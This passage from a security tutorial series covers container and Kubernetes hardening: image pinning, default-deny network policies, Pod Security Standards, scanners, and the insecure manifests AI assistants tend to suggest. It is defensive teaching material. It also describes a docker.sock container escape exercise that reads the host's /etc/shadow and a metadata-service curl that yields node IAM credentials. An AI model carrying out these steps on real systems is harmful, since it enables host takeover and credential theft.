# CRITICAL: 12 HIGH: 45 MEDIUM: 89 LOW: 67
# Common supply chain attacks:
# 1. Typosquatting: ngnix instead of nginx, mongodp instead of mongodb
# 2. Malicious official-looking images with crypto miners
# 3. Compromised upstream components inside base images (e.g. the xz/liblzma backdoor)
# 4. Outdated images with known CVEs never patched
# Always use specific version tags, NEVER :latest in production
# Bad: FROM nginx:latest
# Good: FROM nginx:1.25.4-alpine@sha256:abc123...
# The digest pin (@sha256:...) ensures the exact image content
# Verify image signatures with cosign
cosign verify --key cosign.pub myregistry.io/myimage:v1.0
The :latest tag deserves special mention. In development, pulling :latest is convenient -- you always get the newest version. In production, it means you have no idea what you're actually running. The image behind :latest can change at any time -- the registry owner pushes a new version and every deployment that pulls :latest gets different code on the next restart. For a public image, this means an attacker who compromises the registry account can push a malicious image as :latest and every cluster pulling that image will run the attacker's code on the next pod restart. Pin your images. Use digest references. Verify signatures. This is the container equivalent of pinning dependency versions instead of using * in your package.json.
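Checking for unpinned images is easy to automate across Dockerfiles and manifests. This is a minimal sketch of the classification, assuming plain image reference strings as input. The three labels and the function name are hypothetical.

```python
def pin_level(image_ref):
    """Classify an image reference as 'digest', 'tag', or 'floating'."""
    if "@sha256:" in image_ref:
        return "digest"          # content-addressed: cannot change silently
    # Only look at the last path component, so a registry port
    # (registry.local:5000/app) is not mistaken for a tag.
    last_component = image_ref.rsplit("/", 1)[-1]
    if ":" not in last_component:
        return "floating"        # no tag means an implicit :latest
    tag = last_component.rsplit(":", 1)[1]
    return "floating" if tag == "latest" else "tag"


if __name__ == "__main__":
    for ref in ("nginx", "nginx:latest", "nginx:1.25.4-alpine",
                "registry.local:5000/app", "nginx:1.25.4-alpine@sha256:abc123"):
        print(f"{ref:45} {pin_level(ref)}")
```

A version tag is better than :latest but is still mutable on the registry side. Only the digest form pins the exact content.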
Service Mesh and Network Policies
By default, Kubernetes networking is completely flat: every pod can talk to every other pod in the cluster. There is no network segmentation. A compromised pod in the development namespace can reach services in the production namespace. This is the equivalent of putting every server on the same VLAN with no firewall rules (remember network segmentation from episode 34?).
# Default state: NO network policies = everything talks to everything
# This is the Kubernetes equivalent of "any any permit"
# Fix: Default-deny NetworkPolicy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
# With no ingress/egress rules specified,
# ALL traffic to/from pods in this namespace is denied
# Then whitelist only what's needed
# Example: allow only the frontend to talk to the backend
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - port: 8080
      protocol: TCP
Service meshes like Istio and Linkerd add another layer on top of network policies: mutual TLS between pods (every inter-service connection is encrypted and authenticated), fine-grained traffic policies, and observability. But they also add complexity -- and as we've established throughout this series, complexity is the enemy of security. A misconfigured Istio sidecar proxy can actually WEAKEN security by providing an additional attack surface. Only deploy a service mesh if you have the operational maturity to configure and maintain it correctly.
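A quick way to find namespaces that are still wide open is to look for the default-deny policy shown earlier. The sketch below takes a list of namespace names and the JSON from kubectl get networkpolicy --all-namespaces -o json. The function name is hypothetical, and it only recognises the exact default-deny shape from this episode (empty podSelector, both policy types, no rules).

```python
def namespaces_missing_default_deny(namespaces, policy_list):
    """Return namespaces that have no deny-all NetworkPolicy for ingress and egress."""
    covered = set()
    for policy in policy_list.get("items", []):
        spec = policy.get("spec") or {}
        selects_all_pods = not spec.get("podSelector")      # {} selects every pod
        policy_types = set(spec.get("policyTypes") or [])
        has_rules = bool(spec.get("ingress")) or bool(spec.get("egress"))
        if selects_all_pods and {"Ingress", "Egress"} <= policy_types and not has_rules:
            covered.add(policy["metadata"]["namespace"])
    return sorted(set(namespaces) - covered)


if __name__ == "__main__":
    policies = {"items": [{
        "metadata": {"name": "default-deny-all", "namespace": "production"},
        "spec": {"podSelector": {}, "policyTypes": ["Ingress", "Egress"]},
    }]}
    print(namespaces_missing_default_deny(["production", "development"], policies))
```

Even a correct policy only helps if the cluster's network plugin enforces NetworkPolicy. On a plugin without that support the objects are accepted but have no effect.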
Defense: Securing Containers and Kubernetes
# 1. Pod Security Standards (PSS) -- enforce restricted profile
# This replaces the deprecated PodSecurityPolicy
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted
# The "restricted" profile prevents:
# - Privileged containers
# - Host networking, host PID, host IPC
# - hostPath volumes
# - Privilege escalation (requires allowPrivilegeEscalation: false)
# - Running as root (requires runAsNonRoot: true)
# - Most Linux capabilities (drop ALL; only NET_BIND_SERVICE may be added back)
# - Unconfined seccomp profiles
# It does NOT require a read-only root filesystem --
# set readOnlyRootFilesystem: true yourself
# 2. NEVER mount docker.sock into containers
# Use Kaniko or Buildah for rootless image builds in CI/CD
# If you MUST mount the socket, use a restricted API proxy like
# Tecnativa/docker-socket-proxy that only allows specific API calls
# 3. NEVER run containers as --privileged
# Use specific capabilities instead:
# docker run --cap-add NET_ADMIN (instead of --privileged)
# docker run --device /dev/fuse (instead of --privileged)
# 4. Scan ALL images before deployment
# In CI/CD pipeline:
trivy image --exit-code 1 --severity CRITICAL myimage:v1.0
# Fail the pipeline if critical vulnerabilities are found
# 5. Enable etcd encryption at rest
# In kube-apiserver configuration:
# --encryption-provider-config=/path/to/encryption-config.yaml
# 6. Use OPA/Gatekeeper for policy enforcement
# Gatekeeper is a Kubernetes admission controller that evaluates
# pods against policies BEFORE they're created
# Example: deny any pod requesting privileged mode
# 7. Enable audit logging on the API server
# --audit-log-path=/var/log/kubernetes/audit.log
# --audit-policy-file=/etc/kubernetes/audit-policy.yaml
# 8. Use distroless or scratch base images
# FROM gcr.io/distroless/static:nonroot
# No shell, no package manager, no utilities
# An attacker who gets RCE can't even run 'ls' or 'cat'
# 9. Runtime security monitoring (Falco)
# Falco watches system calls and alerts on suspicious activity:
# - Shell spawned inside container
# - Sensitive file read (/etc/shadow, /etc/passwd)
# - Network connection to unexpected destination
# - Binary executed that wasn't in the original image
The distroless approach deserves highlighting because it flips the container security model on its head. Instead of building a full OS image and then trying to restrict what an attacker can do, you build an image with NOTHING except your application binary. No shell. No package manager. No curl. No wget. No cat. An attacker who achieves remote code execution inside a distroless container cannot do much with it -- there are no tools to use for reconnaissance, no shell to execute commands, no utilities to exfiltrate data. It doesn't prevent all attacks (they can still make network connections, read files through the application runtime), but it dramatically reduces the blast radius of a compromise.
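The kind of rule an admission controller such as Gatekeeper evaluates can be sketched in a few lines. The example below checks a Pod manifest (already parsed into a dict) against a small subset of the restricted profile. It is not Gatekeeper's policy language and not the full standard, and the function name is hypothetical.

```python
def restricted_violations(pod):
    """Return human-readable violations for a Pod manifest given as a dict."""
    spec = pod.get("spec") or {}
    pod_sc = spec.get("securityContext") or {}
    violations = []
    for flag in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(flag):
            violations.append(f"{flag} is enabled")
    for volume in spec.get("volumes") or []:
        if "hostPath" in volume:
            violations.append(f"volume {volume.get('name')} uses hostPath")
    containers = (spec.get("initContainers") or []) + (spec.get("containers") or [])
    for container in containers:
        name = container.get("name", "<unnamed>")
        sc = container.get("securityContext") or {}
        if sc.get("privileged"):
            violations.append(f"{name}: privileged container")
        if sc.get("allowPrivilegeEscalation") is not False:
            violations.append(f"{name}: allowPrivilegeEscalation not set to false")
        # The container-level setting wins; otherwise fall back to the pod level.
        if not sc.get("runAsNonRoot", pod_sc.get("runAsNonRoot", False)):
            violations.append(f"{name}: runAsNonRoot not set to true")
    return violations


if __name__ == "__main__":
    pwned = {"spec": {
        "containers": [{"name": "pwn", "image": "alpine",
                        "securityContext": {"privileged": True}}],
        "volumes": [{"name": "hostfs", "hostPath": {"path": "/"}}],
    }}
    for violation in restricted_violations(pwned):
        print(violation)
```

Run against the "pwned" pod from the RBAC section, this flags the hostPath volume and the privileged container before the pod would ever be scheduled, which is the advantage of admission-time checks over runtime detection.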
The AI Slop Connection
Container security is where the AI code generation problem hits especially hard. Developers ask AI assistants for help with Kubernetes manifests and Docker configurations, and the suggestions are consistently insecure:
- securityContext: privileged: true because "the container needs access to the GPU"
- Mounting docker.sock because "the CI/CD pipeline needs to build images"
- serviceAccountName: default with cluster-admin binding because "the app needs to access the API"
- FROM ubuntu:latest instead of pinned distroless images because it's "easier to debug"
- Kubernetes Secrets in plaintext YAML committed to git because "kubectl apply needs them"
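Several of the patterns in this list can be caught before a manifest ever reaches the cluster. Below is a rough sketch of a pre-commit style check, assuming plain-text Kubernetes YAML files. The function name audit_manifest and the finding labels are made up for illustration, and it uses grep rather than a YAML parser, so treat it as a tripwire, not a replacement for an admission controller like Gatekeeper.

```shell
#!/bin/sh
# Sketch: flag risky patterns in a Kubernetes manifest with plain grep.
# Not a YAML parser: expect both false positives and misses.

audit_manifest() {
  file="$1"
  findings=0

  # check <label> <extended-regex>: report a finding if the pattern matches
  check() {
    if grep -Eq -- "$2" "$file"; then
      echo "FINDING: $1 ($file)"
      findings=$((findings + 1))
    fi
  }

  check "privileged container"         'privileged:[[:space:]]*true'
  check "privilege escalation allowed" 'allowPrivilegeEscalation:[[:space:]]*true'
  check "Docker socket mount"          'docker\.sock'
  check "unpinned :latest image"       'image:[[:space:]]*[^[:space:]]+:latest'
  check "inline Secret object"         '^kind:[[:space:]]*Secret'

  # Non-zero exit status when anything was flagged, so CI can fail the build
  [ "$findings" -eq 0 ]
}

# Usage:
#   audit_manifest deployment.yaml || echo "review before applying"
```

The point is less the specific regexes than where the check runs: an AI-suggested manifest gets a second look before anyone types kubectl apply.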
The pattern is identical to what we saw with cloud IAM in episodes 35 and 36: the AI generates the simplest configuration that works, and the simplest configuration is the most permissive one. A securityContext with privileged: true, runAsUser: 0, and allowPrivilegeEscalation: true is four lines of YAML. The secure alternative -- specific capabilities, non-root user, read-only filesystem, resource limits, seccomp profile -- is twenty lines. The AI optimizes for brevity. Security requires verbosity.
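To make the "twenty lines" concrete, here is a sketch of what the verbose, secure variant might look like, written out by a small shell helper. The pod name hardened-app, the image registry.example.com/app:1.4.2, the UID 10001 and the resource limits are all placeholder assumptions. Adjust them to the actual workload.

```shell
#!/bin/sh
# Sketch: write a pod manifest with a restrictive securityContext.
# Assumptions (hypothetical): pod name, image reference, UID, resource limits.

write_hardened_pod() {
  out="${1:-hardened-pod.yaml}"
  cat > "$out" <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: hardened-app
spec:
  # No API token in the pod unless the app really talks to the API server
  automountServiceAccountToken: false
  securityContext:
    runAsNonRoot: true
    runAsUser: 10001
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: app
      image: registry.example.com/app:1.4.2
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]
      resources:
        limits:
          cpu: "500m"
          memory: "256Mi"
EOF
}

# Usage (validate client-side without creating anything):
#   write_hardened_pod hardened-pod.yaml
#   kubectl apply --dry-run=client -f hardened-pod.yaml
```

If the application needs one specific capability, add it back explicitly under capabilities.add next to the drop list. That keeps the exception visible in code review.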
The Bigger Picture
Container security is not a separate discipline -- it's the intersection of everything we've covered. Linux privilege escalation (episode 31) maps directly to container escape techniques. Network segmentation (episode 34) maps to Kubernetes network policies. Cloud IAM (episodes 35-36) maps to Kubernetes RBAC. Supply chain attacks map to container image security. And the metadata service attacks we covered in the cloud episodes carry over to Kubernetes pods running on cloud nodes: unless the cluster blocks pod access to the instance metadata service (for example by enforcing IMDSv2 with a hop limit of 1), curl http://169.254.169.254/... from a pod on an EKS node gives you the node's IAM role credentials.
The trend is clear: every layer of abstraction adds security surface. Physical servers had OS-level security. Virtual machines added hypervisor security. Cloud platforms added IAM and API security. Containers added image and runtime security. Kubernetes added orchestration and RBAC security. Each layer is supposed to provide isolation, and each layer introduces new ways that isolation can fail.
The next episodes will move into infrastructure-as-code and automation security -- because the YAML files and Terraform modules that deploy all these containers and cloud resources are themselves an attack surface. If you can compromise the CI/CD pipeline that deploys Kubernetes manifests, you don't need to escape a container or exploit an IAM policy. You just modify the deployment to include your backdoor, and the automation delivers it to production for you.
Exercises
Exercise 1: Create a deliberately vulnerable Docker scenario: run a container with /var/run/docker.sock mounted as a volume (docker run -v /var/run/docker.sock:/var/run/docker.sock -it alpine sh). From inside the container, use the Docker API via curl to (a) list all containers on the host, (b) create a new privileged container with the host filesystem mounted at /hostfs, (c) start that container and verify you can read /etc/shadow from the host. Then remove the socket mount and verify the escape is no longer possible. Document the full attack chain and explain why CI/CD containers that mount the socket are high-value targets.
Exercise 2: Set up a minikube cluster. Create a pod with an overprivileged service account (bind the cluster-admin ClusterRole to the default ServiceAccount in the default namespace). From inside the pod, use kubectl to list all secrets in all namespaces. Then create proper RBAC: a new ServiceAccount with a Role that only allows reading ConfigMaps in its own namespace. Verify the restricted account cannot access secrets or resources in other namespaces. Document the RBAC configuration and explain why the create pods permission is equivalent to node-level access.
Exercise 3: Pull 3 popular Docker images (nginx:latest, node:latest, python:latest) and scan them with Trivy. Document: (a) total vulnerabilities per image broken down by severity (critical, high, medium, low), (b) the most severe CVE in each image and what it affects, (c) which vulnerabilities have fixes available. Then compare nginx:latest vs nginx:alpine vs nginx:1.25-alpine -- document the vulnerability count reduction. Save your analysis to ~/lab-notes/container-vuln-scan.md.